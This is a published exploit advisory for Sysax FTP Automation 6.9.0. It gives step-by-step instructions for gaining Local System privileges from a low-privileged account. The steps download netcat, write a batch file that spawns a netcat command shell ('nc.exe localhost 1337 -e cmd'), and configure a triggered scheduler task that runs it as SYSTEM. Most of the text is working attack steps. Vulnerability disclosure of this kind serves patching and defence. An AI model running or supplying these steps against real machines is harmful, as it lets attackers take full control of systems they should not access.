Sysax FTP Automation 6.9.0 – Privilege Escalation

  • 作者: bzyo
    日期: 2022-03-22
  • 类别:
  • 来源:
  • # Exploit Author: bzyo (@bzyo_)
    # Exploit Title: Sysax FTP Automation 6.9.0 - Privilege Escalation
    # Date: 03-20-2022
    # Vulnerable Software: Sysax FTP Automation 6.9.0
    # Vendor Homepage:
    # Version: 6.9.0
    # Software Link:
    # Tested on: Windows 10 x64
    # Details:
    Sysax Scheduler Service runs as Local System. By default the application allows for low privilege users to create/run backup jobs other than themselves.By removing the option to run as current user or another, the task will run as System.A low privilege user could abuse this and escalate their privileges to local system.
    # Prerequisites:
    To successfully exploit this vulnerability, an attacker must already have local access to a system running Sysax FTP Automation using a low privileged user account
    # Exploit:
    Logged in as low privileged account
    1. Create folder c:\temp
    2. Download netcat (nc.exe) to c:\temp
    3. Create file 'pwn.bat' in c:\temp with contents
    	c:\temp\nc.exe localhost 1337 -e cmd
    4. Open command prompt and netcat listener
    	nc -nlvvp 1337
    5. Open sysaxschedscp.exe from C:\Program Files (x86)\SysaxAutomation
    6. Select Setup Scheduled/Triggered Tasks
    	- Add task (Triggered)
    	- Update folder to monitor to be c:\temp
    	- Check 'Run task if a file is added to the monitor folder or subfolder(s)'
    	- Choose 'Run any other Program' and choose c:\temp\pwn.bat
    	- Uncheck 'Login as the following user to run task'
    	- Finish and Save
    7. Create new text file in c:\temp
    8. Check netcat listener
    	nt authority\system